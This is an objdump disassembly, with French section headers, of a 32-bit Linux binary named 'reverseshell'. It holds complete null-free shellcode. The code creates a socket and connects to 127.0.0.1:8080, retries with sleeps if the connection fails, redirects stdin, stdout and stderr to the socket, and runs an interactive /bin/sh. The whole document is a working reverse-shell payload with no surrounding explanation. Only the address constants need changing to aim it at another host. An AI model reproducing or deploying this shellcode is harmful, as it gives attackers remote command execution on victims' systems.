
reverseshell:     format de fichier elf32-i386


Déassemblage de la section .data :

08049000 <arg0>:
 8049000:	2f                   	das    
 8049001:	62 69 6e             	bound  %ebp,0x6e(%ecx)
 8049004:	2f                   	das    
 8049005:	73 68                	jae    804906f <_start+0x2c>
	...

08049008 <arg1>:
 8049008:	2d 69 00         	sub    $0x53500069,%eax

0804900b <env0>:
 804900b:	50                   	push   %eax
 804900c:	53                   	push   %ebx
 804900d:	31 3d 5c 6e 5b 5c    	xor    %edi,0x5c5b6e5c
 8049013:	74 5d                	je     8049072 <_start+0x2f>
 8049015:	20 5c 75 40          	and    %bl,0x40(%ebp,%esi,2)
 8049019:	5c                   	pop    %esp
 804901a:	68 20 5c 77 5c       	push   $0x5c775c20
 804901f:	6e                   	outsb  %ds:(%esi),(%dx)
 8049020:	5c                   	pop    %esp
 8049021:	5c                   	pop    %esp
 8049022:	24 20                	and    $0x20,%al
 8049024:	3a 20                	cmp    (%eax),%ah
	...

08049027 <argv>:
 8049027:	00 90 04 08 08 90    	add    %dl,-0x6ff7f7fc(%eax)
 804902d:	04 08                	add    $0x8,%al
 804902f:	00 00                	add    %al,(%eax)
	...

08049033 <envv>:
 8049033:	0b 90 04 08 00 00    	or     0x804(%eax),%edx
	...

0804903b <timeval>:
 804903b:	05 00 00 00        	add    $0x1000000,%eax

0804903f <tv_usec>:
 804903f:	01 00                	add    %eax,(%eax)
	...

08049043 <_start>:
 8049043:	66 b8 67 01          	mov    $0x167,%ax
 8049047:	b3 02                	mov    $0x2,%bl
 8049049:	b1 01                	mov    $0x1,%cl
 804904b:	b2 06                	mov    $0x6,%dl
 804904d:	cd 80                	int    $0x80
 804904f:	97                   	xchg   %eax,%edi
 8049050:	31 c9                	xor    %ecx,%ecx
 8049052:	f7 e1                	mul    %ecx
 8049054:	51                   	push   %ecx
 8049055:	51                   	push   %ecx
 8049056:	b9 80 ff ff fe       	mov    $0xfeffff80,%ecx
 804905b:	83 f1 ff             	xor    $0xffffffff,%ecx
 804905e:	51                   	push   %ecx
 804905f:	66 68 1f 90          	pushw  $0x901f
 8049063:	66 6a 02             	pushw  $0x2
 8049066:	89 e1                	mov    %esp,%ecx
 8049068:	6a 10                	push   $0x10
 804906a:	5a                   	pop    %edx
 804906b:	89 fb                	mov    %edi,%ebx
 804906d:	66 b8 6a 01          	mov    $0x16a,%ax
 8049071:	cd 80                	int    $0x80
 8049073:	40                   	inc    %eax
 8049074:	be 04 00 00 00       	mov    $0x4,%esi
 8049079:	83 f8 01             	cmp    $0x1,%eax
 804907c:	75 02                	jne    8049080 <retry>
 804907e:	eb 44                	jmp    80490c4 <continue>

08049080 <retry>:
 8049080:	87 fb                	xchg   %edi,%ebx
 8049082:	b8 a2 00 00 00       	mov    $0xa2,%eax
 8049087:	bb 3b 90 04 08       	mov    $0x804903b,%ebx
 804908c:	b9 00 00 00 00       	mov    $0x0,%ecx
 8049091:	cd 80                	int    $0x80
 8049093:	31 c9                	xor    %ecx,%ecx
 8049095:	f7 e1                	mul    %ecx
 8049097:	51                   	push   %ecx
 8049098:	51                   	push   %ecx
 8049099:	b9 80 ff ff fe       	mov    $0xfeffff80,%ecx
 804909e:	83 f1 ff             	xor    $0xffffffff,%ecx
 80490a1:	51                   	push   %ecx
 80490a2:	66 68 1f 90          	pushw  $0x901f
 80490a6:	66 6a 02             	pushw  $0x2
 80490a9:	89 e1                	mov    %esp,%ecx
 80490ab:	6a 10                	push   $0x10
 80490ad:	5a                   	pop    %edx
 80490ae:	89 fb                	mov    %edi,%ebx
 80490b0:	66 b8 6a 01          	mov    $0x16a,%ax
 80490b4:	cd 80                	int    $0x80
 80490b6:	40                   	inc    %eax
 80490b7:	83 f8 01             	cmp    $0x1,%eax
 80490ba:	74 08                	je     80490c4 <continue>
 80490bc:	4e                   	dec    %esi
 80490bd:	83 fe 01             	cmp    $0x1,%esi
 80490c0:	75 be                	jne    8049080 <retry>
 80490c2:	eb 00                	jmp    80490c4 <continue>

080490c4 <continue>:
 80490c4:	87 df                	xchg   %ebx,%edi
 80490c6:	6a 02                	push   $0x2
 80490c8:	59                   	pop    %ecx

080490c9 <loop>:
 80490c9:	b0 3f                	mov    $0x3f,%al
 80490cb:	cd 80                	int    $0x80
 80490cd:	49                   	dec    %ecx
 80490ce:	79 f9                	jns    80490c9 <loop>
 80490d0:	bb 00 90 04 08       	mov    $0x8049000,%ebx
 80490d5:	b9 27 90 04 08       	mov    $0x8049027,%ecx
 80490da:	ba 33 90 04 08       	mov    $0x8049033,%edx
 80490df:	b0 0b                	mov    $0xb,%al
 80490e1:	cd 80                	int    $0x80
